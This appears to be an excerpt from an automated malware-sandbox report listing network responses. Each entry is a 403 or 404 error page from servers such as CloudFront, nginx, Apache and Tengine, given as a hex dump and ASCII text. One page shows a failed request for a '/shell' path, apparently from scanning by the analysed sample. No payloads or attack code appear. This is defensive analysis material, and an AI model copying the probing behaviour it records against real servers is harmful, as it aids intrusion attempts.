        Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: CloudFrontDate: Mon, 21 Mar 2022 19:08:58 GMTContent-Type: text/htmlContent-Length: 915Connection: keep-aliveX-Cache: Error from cloudfrontVia: 1.1 35edfe00d0c28f55b85d2366a87b40f8.cloudfront.net (CloudFront)X-Amz-Cf-Pop: CDG53-C1X-Amz-Cf-Id: Gwv3qlClGFm7y5m_iwKFoM4wOM7CkZe9btU7A9Jqjf_ARWZ5LqA2ZQ==Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 6c 6f 6f 73 65 2e 64 74 64 22 3e 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 4f 4e 54 45 4e 54 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 22 3e 0a 3c 54 49 54 4c 45 3e 45 52 52 4f 52 3a 20 54 68 65 20 72 65 71 75 65 73 74 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 73 61 74 69 73 66 69 65 64 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 34 30 33 20 45 52 52 4f 52 3c 2f 48 31 3e 0a 3c 48 32 3e 54 68 65 20 72 65 71 75 65 73 74 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 73 61 74 69 73 66 69 65 64 2e 3c 2f 48 32 3e 0a 3c 48 52 20 6e 6f 73 68 61 64 65 20 73 69 7a 65 3d 22 31 70 78 22 3e 0a 42 61 64 20 72 65 71 75 65 73 74 2e 0a 57 65 20 63 61 6e 27 74 20 63 6f 6e 6e 65 63 74 20 74 6f 20 74 68 65 20 73 65 72 76 65 72 20 66 6f 72 20 74 68 69 73 20 61 70 70 20 6f 72 20 77 65 62 73 69 74 65 20 61 74 20 74 68 69 73 20 74 69 6d 65 2e 20 54 68 65 72 65 20 6d 69 67 68 74 20 62 65 20 74 6f 6f 20 6d 75 63 68 20 74 72 61 66 66 69 63 20 6f 72 20 61 20 63 6f 6e 66 69 67 75 72 61 74 69 6f 6e 20 65 72 72 6f 72 2e 20 54 72 79 20 61 67 61 69 6e 20 6c 61 74 65 72 2c 20 6f 72 20 63 6f 6e 74 61 63 74 20 74 68 65 20 61 70 70 20 6f 72 20 77 65 62 73 69 74 65 20 6f 77 6e 65 72 2e 0a 3c 42 52 20 63 6c 65 61 72 3d 22 61 6c 6c 22 3e 0a 49 66 20 79 6f 75 20 70 72 6f 76 69 64 65 20 63 6f 6e 74 65 6e 74 20 74 6f 20 63 75 73 74 6f 6d 65 72 73 20 74 68 72 6f 75 67 68 20 43 6c 6f 75 64 46 72 6f 6e 74 2c 20 79 6f 75 20 63 61 6e 20 66 69 6e 64 20 73 74 65 70 73 20 74 6f 20 74 72 6f 75 62 6c 65 73 68 6f 6f 74 20 61 6e 64 20 68 65 6c 70 20 70 72 65 76 65 6e 74 20 74 68 69 73 20 65 72 72 6f 72 20 62 79 20 72 65 76 69 65 77 69 6e 67 20 74 68 65 20 43 6c 6f 75 64 46 72 6f 6e 74 20 64 6f 63 75 6d 65 6e 74 61 74 69 6f 6e 2e 0a 3c 42 52 20 63 6c 65 61 72 3d 22 61 6c 6c 22 3e 0a 3c 48 52 20 6e 6f 73 68 61 64 65 20 73 69 7a 65 3d 22 31 70 78 22 3e 0a 3c 50 52 45 3e 0a 47 65 6e 65 72 61 74 65 64 20 62 79 20 63 6c 6f 75 64 66 72 6f 6e 74 20 28 43 6c 6f 75 64 46 72 6f 6e 74 29 0a 52 65 71 75 65 73 74 20 49 44 3a 20 47 77 76 33 71 6c 43 6c 47 46 6d 37 79 35 6d 5f 69 77 4b 46 6f 4d 34 77 4f 4d 37 43 6b 5a 65 39 62 74 55 37 41 39 4a 71 6a 66 5f 41 52 57 5a 35 4c 71 41 32 5a 51 3d 3d 0a 3c 2f 50 52 45 3e 0a 3
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 21 Mar 2022 19:09:00 GMTContent-Type: text/htmlContent-Length: 162Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.12.2Date: Mon, 21 Mar 2022 19:09:06 GMTContent-Type: text/htmlContent-Length: 3650Connection: keep-aliveVary: Accept-EncodingETag: "5a9e5ebd-e42"Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 31 2f 44 54 44 2f 78 68 74 6d 6c 31 31 2e 64 74 64 22 3e 0a 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 54 68 65 20 70 61 67 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 2f 2a 3c 21 5b 43 44 41 54 41 5b 2a 2f 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 30 30 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 30 2e 39 65 6d 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 73 61 6e 73 2d 73 65 72 69 66 2c 68 65 6c 76 65 74 69 63 61 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3a 6c 69 6e 6b 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 63 30 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3a 76 69 73 69 74 65 64 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 63 30 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 61 3a 68 6f 76 65 72 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 66 35 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 68 31 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 2e 36 65 6d 20 32 65 6d 20 30 2e 34 65 6d 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 7
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3 (Ubuntu)Date: Mon, 21 Mar 2022 19:09:07 GMTContent-Type: text/htmlContent-Length: 178Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 30 2e 33 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.10.3 (Ubuntu)</center></body></html>
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Mon, 21 Mar 2022 19:09:10 GMTContent-Type: text/htmlContent-Length: 162Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.2Date: Mon, 21 Mar 2022 19:09:10 GMTContent-Type: text/htmlContent-Length: 169Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 32 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.2</center></body></html>
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 21 Mar 2022 19:09:11 GMTServer: Apache/2.2.22 (Ubuntu)Vary: Accept-EncodingContent-Length: 279Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 73 68 65 6c 6c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 32 2e 32 32 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 32 2e 35 36 2e 35 39 2e 37 38 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /shell was not found on this server.</p><hr><address>Apache/2.2.22 (Ubuntu) Server at 2.56.59.78 Port 80</address></body></html>
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 22 Mar 2022 01:13:14 GMT
        Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: CloudFrontDate: Mon, 21 Mar 2022 19:09:11 GMTContent-Type: text/htmlContent-Length: 915Connection: keep-aliveX-Cache: Error from cloudfrontVia: 1.1 83e7aaf13af313eacb0b03372aad0ab8.cloudfront.net (CloudFront)X-Amz-Cf-Pop: MIA3-P3X-Amz-Cf-Id: PxRc4ZGEN2ZzizCVlG7g-go_JTQSqaGLO7NiWc98xQz8qDrEJGEGuQ==Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 6c 6f 6f 73 65 2e 64 74 64 22 3e 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 4f 4e 54 45 4e 54 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 22 3e 0a 3c 54 49 54 4c 45 3e 45 52 52 4f 52 3a 20 54 68 65 20 72 65 71 75 65 73 74 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 73 61 74 69 73 66 69 65 64 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 34 30 33 20 45 52 52 4f 52 3c 2f 48 31 3e 0a 3c 48 32 3e 54 68 65 20 72 65 71 75 65 73 74 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 73 61 74 69 73 66 69 65 64 2e 3c 2f 48 32 3e 0a 3c 48 52 20 6e 6f 73 68 61 64 65 20 73 69 7a 65 3d 22 31 70 78 22 3e 0a 42 61 64 20 72 65 71 75 65 73 74 2e 0a 57 65 20 63 61 6e 27 74 20 63 6f 6e 6e 65 63 74 20 74 6f 20 74 68 65 20 73 65 72 76 65 72 20 66 6f 72 20 74 68 69 73 20 61 70 70 20 6f 72 20 77 65 62 73 69 74 65 20 61 74 20 74 68 69 73 20 74 69 6d 65 2e 20 54 68 65 72 65 20 6d 69 67 68 74 20 62 65 20 74 6f 6f 20 6d 75 63 68 20 74 72 61 66 66 69 63 20 6f 72 20 61 20 63 6f 6e 66 69 67 75 72 61 74 69 6f 6e 20 65 72 72 6f 72 2e 20 54 72 79 20 61 67 61 69 6e 20 6c 61 74 65 72 2c 20 6f 72 20 63 6f 6e 74 61 63 74 20 74 68 65 20 61 70 70 20 6f 72 20 77 65 62 73 69 74 65 20 6f 77 6e 65 72 2e 0a 3c 42 52 20 63 6c 65 61 72 3d 22 61 6c 6c 22 3e 0a 49 66 20 79 6f 75 20 70 72 6f 76 69 64 65 20 63 6f 6e 74 65 6e 74 20 74 6f 20 63 75 73 74 6f 6d 65 72 73 20 74 68 72 6f 75 67 68 20 43 6c 6f 75 64 46 72 6f 6e 74 2c 20 79 6f 75 20 63 61 6e 20 66 69 6e 64 20 73 74 65 70 73 20 74 6f 20 74 72 6f 75 62 6c 65 73 68 6f 6f 74 20 61 6e 64 20 68 65 6c 70 20 70 72 65 76 65 6e 74 20 74 68 69 73 20 65 72 72 6f 72 20 62 79 20 72 65 76 69 65 77 69 6e 67 20 74 68 65 20 43 6c 6f 75 64 46 72 6f 6e 74 20 64 6f 63 75 6d 65 6e 74 61 74 69 6f 6e 2e 0a 3c 42 52 20 63 6c 65 61 72 3d 22 61 6c 6c 22 3e 0a 3c 48 52 20 6e 6f 73 68 61 64 65 20 73 69 7a 65 3d 22 31 70 78 22 3e 0a 3c 50 52 45 3e 0a 47 65 6e 65 72 61 74 65 64 20 62 79 20 63 6c 6f 75 64 66 72 6f 6e 74 20 28 43 6c 6f 75 64 46 72 6f 6e 74 29 0a 52 65 71 75 65 73 74 20 49 44 3a 20 50 78 52 63 34 5a 47 45 4e 32 5a 7a 69 7a 43 56 6c 47 37 67 2d 67 6f 5f 4a 54 51 53 71 61 47 4c 4f 37 4e 69 57 63 39 38 78 51 7a 38 71 44 72 45 4a 47 45 47 75 51 3d 3d 0a 3c 2f 50 52 45 3e 0a 3c
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 21 Mar 2022 19:09:11 GMTContent-Type: text/htmlContent-Length: 146Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
        Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: CloudFrontDate: Mon, 21 Mar 2022 19:09:15 GMTContent-Type: text/htmlContent-Length: 915Connection: keep-aliveX-Cache: Error from cloudfrontVia: 1.1 681f9d1841b09d340072c749d4b22f0e.cloudfront.net (CloudFront)X-Amz-Cf-Pop: ATH50-C1X-Amz-Cf-Id: SQp5X6B5qGSMM7h1xMmOIQ-AgjurfOHPXg60pXNsHabRbKXXxkWfWA==Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 6c 6f 6f 73 65 2e 64 74 64 22 3e 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 4f 4e 54 45 4e 54 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 22 3e 0a 3c 54 49 54 4c 45 3e 45 52 52 4f 52 3a 20 54 68 65 20 72 65 71 75 65 73 74 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 73 61 74 69 73 66 69 65 64 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 34 30 33 20 45 52 52 4f 52 3c 2f 48 31 3e 0a 3c 48 32 3e 54 68 65 20 72 65 71 75 65 73 74 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 73 61 74 69 73 66 69 65 64 2e 3c 2f 48 32 3e 0a 3c 48 52 20 6e 6f 73 68 61 64 65 20 73 69 7a 65 3d 22 31 70 78 22 3e 0a 42 61 64 20 72 65 71 75 65 73 74 2e 0a 57 65 20 63 61 6e 27 74 20 63 6f 6e 6e 65 63 74 20 74 6f 20 74 68 65 20 73 65 72 76 65 72 20 66 6f 72 20 74 68 69 73 20 61 70 70 20 6f 72 20 77 65 62 73 69 74 65 20 61 74 20 74 68 69 73 20 74 69 6d 65 2e 20 54 68 65 72 65 20 6d 69 67 68 74 20 62 65 20 74 6f 6f 20 6d 75 63 68 20 74 72 61 66 66 69 63 20 6f 72 20 61 20 63 6f 6e 66 69 67 75 72 61 74 69 6f 6e 20 65 72 72 6f 72 2e 20 54 72 79 20 61 67 61 69 6e 20 6c 61 74 65 72 2c 20 6f 72 20 63 6f 6e 74 61 63 74 20 74 68 65 20 61 70 70 20 6f 72 20 77 65 62 73 69 74 65 20 6f 77 6e 65 72 2e 0a 3c 42 52 20 63 6c 65 61 72 3d 22 61 6c 6c 22 3e 0a 49 66 20 79 6f 75 20 70 72 6f 76 69 64 65 20 63 6f 6e 74 65 6e 74 20 74 6f 20 63 75 73 74 6f 6d 65 72 73 20 74 68 72 6f 75 67 68 20 43 6c 6f 75 64 46 72 6f 6e 74 2c 20 79 6f 75 20 63 61 6e 20 66 69 6e 64 20 73 74 65 70 73 20 74 6f 20 74 72 6f 75 62 6c 65 73 68 6f 6f 74 20 61 6e 64 20 68 65 6c 70 20 70 72 65 76 65 6e 74 20 74 68 69 73 20 65 72 72 6f 72 20 62 79 20 72 65 76 69 65 77 69 6e 67 20 74 68 65 20 43 6c 6f 75 64 46 72 6f 6e 74 20 64 6f 63 75 6d 65 6e 74 61 74 69 6f 6e 2e 0a 3c 42 52 20 63 6c 65 61 72 3d 22 61 6c 6c 22 3e 0a 3c 48 52 20 6e 6f 73 68 61 64 65 20 73 69 7a 65 3d 22 31 70 78 22 3e 0a 3c 50 52 45 3e 0a 47 65 6e 65 72 61 74 65 64 20 62 79 20 63 6c 6f 75 64 66 72 6f 6e 74 20 28 43 6c 6f 75 64 46 72 6f 6e 74 29 0a 52 65 71 75 65 73 74 20 49 44 3a 20 53 51 70 35 58 36 42 35 71 47 53 4d 4d 37 68 31 78 4d 6d 4f 49 51 2d 41 67 6a 75 72 66 4f 48 50 58 67 36 30 70 58 4e 73 48 61 62 52 62 4b 58 58 78 6b 57 66 57 41 3d 3d 0a 3c 2f 50 52 45 3e 0a 3
        Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: TengineDate: Mon, 21 Mar 2022 19:09:19 GMTContent-Type: text/htmlContent-Length: 238Connection: keep-aliveVia: bcache1.cn1574[,0]Timing-Allow-Origin: *EagleId: 2f691d1516478897592654752eData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0d 0a 3c 70 3e 59 6f 75 20 64 6f 6e 27 74 20 68 61 76 65 20 70 65 72 6d 69 73 73 69 6f 6e 20 74 6f 20 61 63 63 65 73 73 20 74 68 65 20 55 52 4c 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 68 72 2f 3e 50 6f 77 65 72 65 64 20 62 79 20 54 65 6e 67 69 6e 65 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>403 Forbidden</title></head><body><h1>403 Forbidden</h1><p>You don't have permission to access the URL on this server.<hr/>Powered by Tengine</body></html>
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 21 Mar 2022 19:09:19 GMTContent-Type: text/htmlContent-Length: 146Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 21 Mar 2022 19:09:19 GMTContent-Type: text/htmlContent-Length: 146Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
